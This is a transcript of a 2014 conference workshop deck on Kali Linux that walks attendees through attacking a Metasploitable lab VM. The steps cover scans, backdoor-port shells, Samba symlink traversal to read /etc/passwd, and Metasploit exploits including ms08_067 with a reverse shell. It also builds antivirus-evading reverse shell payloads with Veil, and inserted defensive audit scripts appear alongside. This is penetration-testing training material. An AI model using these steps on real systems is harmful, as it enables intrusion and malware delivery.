kali linux - falconer

Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge

Upload: tony-godfrey

Post on 04-Dec-2014


DESCRIPTION

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

TRANSCRIPT

Page 1: Kali Linux - Falconer

Kali Linux

Presentation on Kali Linux

Ohio HTCIA 2014 Spring Conference

Salt Fork Lodge

Page 2: Kali Linux - Falconer

Welcome – Salt Fork 2014

Page 3: Kali Linux - Falconer

Welcome

Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level.

He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

Page 4: Kali Linux - Falconer

Who or What is ‘Kali’?

Page 5: Kali Linux - Falconer

Who is Kali?

Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!

Anu Yadavalli

Page 6: Kali Linux - Falconer

Hindu Kali

Page 7: Kali Linux - Falconer

What is Kali Linux?

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Page 8: Kali Linux - Falconer

What’s on the DVD?

/books
◦ Official Kali Guide
◦ eForensics

/media
◦ 7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager

/metaspolitable

/PPT

Page 9: Kali Linux - Falconer

http://www.kali.org/

Page 10: Kali Linux - Falconer
Page 11: Kali Linux - Falconer

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Page 12: Kali Linux - Falconer

Ready?

Page 13: Kali Linux - Falconer

Use your powers for good

Page 14: Kali Linux - Falconer

Getting Ready…

- Let’s make a folder called kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player

Let’s make sure the virtual environments are working and can ‘ping’ each other

Page 15: Kali Linux - Falconer

VMware Player

Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

Page 16: Kali Linux - Falconer

Logins / Passwords

Kali Login: root
Kali Password: password

Metasploitable Login: msfadmin
Metasploitable Password: msfadmin

Page 17: Kali Linux - Falconer

Metasploitable V/E

Login msfadmin Password msfadmin

ifconfig Jot down the IP & Netmask

route Jot down the Gateway

Page 18: Kali Linux - Falconer

Metasploitable V/E

Virtual Environment #1
◦ Metasploitable

Go to TERMINAL

rlogin -l root <IP Address>

cd /tmp

ls -l ...vs... ls -la

rm .X0-lock

startx

Page 19: Kali Linux - Falconer

Kali V/E

Login root Password password

ifconfig Jot down the IP & Netmask

route Jot down the Gateway

Page 20: Kali Linux - Falconer

Kali V/E

Go to:

Applications System Tools Preferences System Settings Display Resolution: ____

Then…[Apply]

Page 21: Kali Linux - Falconer

Kali Updating

From the command line, type

apt-get update && apt-get upgrade

Note: This has already been done to save time, but should be done after a new installation.

Page 22: Kali Linux - Falconer

Are we good?

Page 23: Kali Linux - Falconer

There are several categories

- Top 10 Security Tools
- Information Gathering
- Vulnerability Analysis
- Web Applications
- Password Attacks
- Wireless Attacks
- Exploitation Tools
- Sniffing/Spoofing
- Maintaining Access
- Reverse Engineering
- Stress Testing
- Hardware Hacking
- Forensics
- Reporting Tools
- System Services

Page 24: Kali Linux - Falconer

Metapackages also exist

Page 25: Kali Linux - Falconer

Command Line Tools

Presentation on Kali Linux

Page 26: Kali Linux - Falconer

ping

ping

Packet InterNet Groper

Port = 8

Establishes physical connectivity between two entities

(from Kali) ping <Target IP>

Did it echo back?

Page 27: Kali Linux - Falconer

top

top

Tells us what services are running, processes, memory allocation

Basically, a live system monitor

Page 28: Kali Linux - Falconer

df

df

Tells us how much space is available or ‘disk free’

Page 29: Kali Linux - Falconer

du

du

Tells us how much space is taken or ‘disk used’.

You can get a shorter report by…

‘du -s’ … (disk used - summary)

Page 30: Kali Linux - Falconer

free

free

How much ‘free’ memory is available

Page 31: Kali Linux - Falconer

ls

ls

This is for ‘list’

ls -l (list - long)

ls -la (list - long - all attributes)

Page 32: Kali Linux - Falconer

pwd

pwd

Directory structure

Means ‘path to working directory’ or ‘print working directory’

Page 33: Kali Linux - Falconer

ps / ps aux / pstree

ps

Means ‘Process Status’
◦ aux – auxiliary view
◦ pstree – shows parent/child relationships
◦ Windows – tasklist / taskkill

kill - Stops a process (ex: kill PID)

Page 34: Kali Linux - Falconer

Both Environments

Presentation on Kali Linux

Page 35: Kali Linux - Falconer

Can you ‘ping’ each other?

Virtual Environment #1 (Metasploitable)
◦ Go to TERMINAL
◦ ifconfig
◦ …jot this number down…

Virtual Environment #2 (Kali)
◦ Go to TERMINAL
◦ ifconfig
◦ …jot this number down…

Page 36: Kali Linux - Falconer

CLI & Services

Presentation on Kali Linux

Page 37: Kali Linux - Falconer

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute -i eth0 <Target IP>

It displays the route (path) and measures the transit delays of packets across an Internet Protocol (IP) network

Page 38: Kali Linux - Falconer

nmap

nmap -p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

Page 39: Kali Linux - Falconer

nmap

nmap -sS -Pn -A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

Page 40: Kali Linux - Falconer

rlogin (from Metasploitable)

rlogin -l root <Target IP>

whoami

tcpdump -i eth0 host <Target IP>

A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

Page 41: Kali Linux - Falconer

rpcinfo

rpcinfo -p <Target IP>

A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

Page 42: Kali Linux - Falconer

showmount

showmount -e <Target IP>

showmount -a <Target IP>

It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.

Page 43: Kali Linux - Falconer

telnet

telnet <Target IP> 21

After '220...'

user backdoored:)

<CTRL><]>

quit

Port 20/21 is FTP

Page 44: Kali Linux - Falconer

telnet

telnet <Target IP> 6200

After 'Escape character...',

id;

<CTRL><]>

quit

Port 6200 - Oracle Notification Service remote port Oracle Application Server

Page 45: Kali Linux - Falconer

telnet

telnet <Target IP> 6667

IRC (Internet Relay Chat)

Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

Page 46: Kali Linux - Falconer

telnet

telnet <Target IP> 1524

After 'root@meta....',

id

Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
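The telnet slides probe ports 21, 6200, 6667 and 1524 from the outside. As an added example (not part of the original slides), this shell function does the matching check from the host side, flagging listeners on those ports in `ss -tln` output; the function names and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag TCP listeners on the ports probed in the telnet slides.
# Input is text in `ss -tln` format: a header, then one socket per line.

audit_listeners() {
    # Prints "port<TAB>local address<TAB>note" for each matching listener.
    awk '
        BEGIN {
            # Notes paraphrase the slides; the port list is the only policy here.
            note["21"]   = "FTP control channel"
            note["1524"] = "ingreslock, a common backdoor shell port"
            note["6200"] = "answered shell commands in the lab"
            note["6667"] = "IRC, also used by many trojans/backdoors"
        }
        $1 == "LISTEN" {
            addr = $4                 # Local Address:Port column
            port = addr
            sub(/.*:/, "", port)      # keeps the digits after the last colon
            if (port in note) printf "%s\t%s\t%s\n", port, addr, note[port]
        }
    '
}

# Constructed sample, shaped like `ss -tln` on a host similar to the lab target.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      32     0.0.0.0:21          0.0.0.0:*
LISTEN 0      50     127.0.0.1:3306      0.0.0.0:*
LISTEN 0      128    [::]:6667           [::]:*
LISTEN 0      5      0.0.0.0:1524        0.0.0.0:*'

sample_findings() {
    printf '%s\n' "$SAMPLE_SS" | audit_listeners
}

# Live use on a host you administer: ss -tln | audit_listeners
sample_findings
```

A listener on 1524 or 6200 that no installed service accounts for is the finding to chase first; 21 and 6667 need a check of which daemon owns the socket.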

Page 47: Kali Linux - Falconer

Are we good?

Page 48: Kali Linux - Falconer

smbclient

smbclient -L //<Target IP>

msfconsole...wait, wait, wait..., then

use auxiliary/admin/smb/samba_symlink_traversal

set RHOST <Target IP>

set SMBSHARE tmp

Page 49: Kali Linux - Falconer

smbclient

exploit

...Connecting to the server.....

...<yadda, yadda, yadda>...

...Auxiliary module....

At the prompt, type exit

Page 50: Kali Linux - Falconer

smbclient

smbclient //<Target IP>/tmp

Do you get the 'smb: \>' prompt?

cd rootfs

cd etc

more passwd

Do you get a list of all user accts?
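The `samba_symlink_traversal` walk-through above depends on a writable share on a server that follows symlinks out of the share path. As an added example (not from the slides), this shell function lists the shares in an `smb.conf` that combine both conditions; the function names, the sample config and the caller-supplied `wide links` default are assumptions.

```shell
#!/bin/sh
# Added example: list smb.conf shares that are writable AND follow wide links.
# $1 is the build default for "wide links" (an assumption supplied by the caller).
check_wide_links() {
    awk -v wl_default="${1:-no}" '
        function truthy(v) { v = tolower(v); return (v == "yes" || v == "true" || v == "1") }
        function report() {
            if (sect == "" || sect == "global") return
            if (sect in wide)          wl = wide[sect]
            else if ("global" in wide) wl = wide["global"]
            else                       wl = truthy(wl_default)
            if (wl && rw[sect]) print sect
        }
        /^[ \t]*([#;]|$)/ { next }                     # comments and blank lines
        /^[ \t]*\[/ {                                  # start of a new [section]
            report()
            sect = $0; sub(/^[ \t]*\[/, "", sect); sub(/\].*$/, "", sect)
            sect = tolower(sect); next
        }
        {
            key = $0; sub(/=.*$/, "", key)
            val = $0; sub(/^[^=]*=/, "", val)
            gsub(/[ \t]/, "", key); key = tolower(key) # names ignore case and spaces
            gsub(/^[ \t]+|[ \t]+$/, "", val)
            if (key == "widelinks")     wide[sect] = truthy(val)
            else if (key == "readonly") rw[sect] = !truthy(val)
            else if (key == "writable" || key == "writeable") rw[sect] = truthy(val)
        }
        END { report() }
    '
}

# Constructed sample; [tmp] mirrors the share name used in the slides.
SAMPLE_CONF='[global]
   workgroup = WORKGROUP
[tmp]
   path = /tmp
   read only = no
[docs]
   writeable = yes
   wide links = no
[archive]
   wide links = yes'

sample_check() { printf '%s\n' "$SAMPLE_CONF" | check_wide_links "$1"; }

sample_check yes
```

The check is conservative: it does not model `unix extensions` or `allow insecure wide links`, which newer Samba builds use to override `wide links`. Setting `wide links = no` on every flagged share closes the path the slides walk through.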

Page 51: Kali Linux - Falconer

tcpdump

On Kali…

tcpdump -i eth0 src <Target IP>

On Metasploitable…

ping www.yahoo.com

open a Browser & go to CNN.com

Page 52: Kali Linux - Falconer

netdiscover

On Kali

netdiscover -i eth0 -r <Target IP>/24

Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.

Page 53: Kali Linux - Falconer

nikto

On Kali

nikto -h <Target IP>

It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

Page 54: Kali Linux - Falconer

sqlmap

On Kali

sqlmap -u http://<Target IP> --dbs

It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Page 55: Kali Linux - Falconer

Wasp Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Mutillidae <p. 8>

The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.

Page 56: Kali Linux - Falconer

Web Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Mutillidae <p. 8>

Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application

Page 57: Kali Linux - Falconer

whatweb

From Kali

whatweb <Target IP>

whatweb -v <Target IP>

whatweb -a 4 <Target IP>

WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

Page 58: Kali Linux - Falconer

From Kali - msfconsole

Presentation on Kali Linux

Page 59: Kali Linux - Falconer

msfconsole

From Kali

service postgresql start

service metasploit start

msfconsole

Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole

We will then take a look at the built-in exploit tools

Page 60: Kali Linux - Falconer

msfconsole

From [msf>] console

help search

show exploits

search dns

‘Help Search’ shows all of the options, ‘Show Exploits’ shows all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

Page 61: Kali Linux - Falconer

msfconsole

From [msf>] console

search Microsoft

search diablo

search irc

search http

Let’s try a few more to see what they do….

Page 62: Kali Linux - Falconer

msfconsole

From [msf>] console, search for ‘unreal’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 63: Kali Linux - Falconer

msfconsole

From [msf>] console (ex: unreal)

set RHOST <IP Address>

show options

exploit

Page 64: Kali Linux - Falconer

msfconsole

From [msf>] console, search for ‘twiki’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 65: Kali Linux - Falconer

msfconsole

From [msf>] console (ex: ‘twiki’)

set RHOST <IP Address>

show options

exploit

Page 66: Kali Linux - Falconer

msfconsole

From [msf>] console, (target: Win XP)

use exploit/windows/smb/ms08_067_netapi

show options

show targets

set target 2

Page 67: Kali Linux - Falconer

msfconsole

From [msf>] console, (target: Win XP)

show options

show advanced

show targets

show payloads

Page 68: Kali Linux - Falconer

msfconsole

From [msf>] console, (target: Win XP)

set payload windows/shell_reverse_tcp

show options

set LHOST <Kali IP Address>

set RHOST <Target IP Address>

Page 69: Kali Linux - Falconer

msfconsole

From [msf>] console, (target: Win XP)

show options

exploit

Any errors?

Page 70: Kali Linux - Falconer

From Kali – more GUI

Presentation on Kali Linux

Page 71: Kali Linux - Falconer

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

Page 72: Kali Linux - Falconer

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

Page 73: Kali Linux - Falconer

FERN

Let’s run FERN

Kali Linux

Wireless Attacks

Wireless Tools

fern-wifi-cracker

Page 74: Kali Linux - Falconer

recon-ng

Kali has many built-in tools, but you can always install more (Debian-based). You may wish to add more, such as recon-ng.

recon-ng: automated info gathering and network reconnaissance.

Page 75: Kali Linux - Falconer

recon-ng

Let’s run recon-ng…

cd /opt/recon-ng

/usr/bin/python recon-ng

show modules

recon/hosts/gather/http/web/google_site

Page 76: Kali Linux - Falconer

recon-ng

Let’s run recon-ng…

set DOMAIN <domain.com>

run (…let this run awhile…)

back (…previous level…)

show modules

Page 77: Kali Linux - Falconer

recon-ng

Let’s run recon-ng…

use reporting/csv

run

Will add your new information to /usr/share/recon-ng/workspaces/default

Page 78: Kali Linux - Falconer

dmitry

If you want something more basic…dmitry

dmitry –s <domain.com>

It gives you site names & IP’s

Page 79: Kali Linux - Falconer

veil

Kali has many built-in tools, but you can always install even more (Debian-based). You may always wish to add more such as veil.

veil: Remote shell payload generator that can bypass many anti-virus programs.

Page 80: Kali Linux - Falconer

veil

Let’s run veil

veil-evasion

list (available payloads list)

use 13 (powershell/VirtualAlloc)

generate

Page 81: Kali Linux - Falconer

veil

Let’s run veil

1 (msfvenom)

[ENTER] (accept default)

Value for LHOST (Target IP)

Value for LPORT (ex: 4000)

Page 82: Kali Linux - Falconer

veil

Let’s run veil

Output name (“Squatch”)

It will store this new batch file to the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.

Page 83: Kali Linux - Falconer

Final Thoughts…

Page 84: Kali Linux - Falconer

Kali Information

See ‘Notes’ section in this slide

Page 85: Kali Linux - Falconer

Kali Comparisons

See ‘Notes’ section in this slide

Page 86: Kali Linux - Falconer

Kali-specific Websites

See ‘Notes’ section in this slide

Page 87: Kali Linux - Falconer

Kali Publications

See ‘Notes’ section in this slide

Page 88: Kali Linux - Falconer

Questions/Concerns

Page 89: Kali Linux - Falconer

But wait, that’s not all

Page 90: Kali Linux - Falconer

Kali in a box?

Do you want to run Kali on a tablet or phone?

http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Page 91: Kali Linux - Falconer

Pentesting with Firefox?

The Firefox web browser is a great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and ‘use your powers for good’.

Page 92: Kali Linux - Falconer

Thank You

Page 93: Kali Linux - Falconer

Thank you

Thank you for your time.

Falconer [email protected]

877 / TUX RULZ or 877 / 889-7859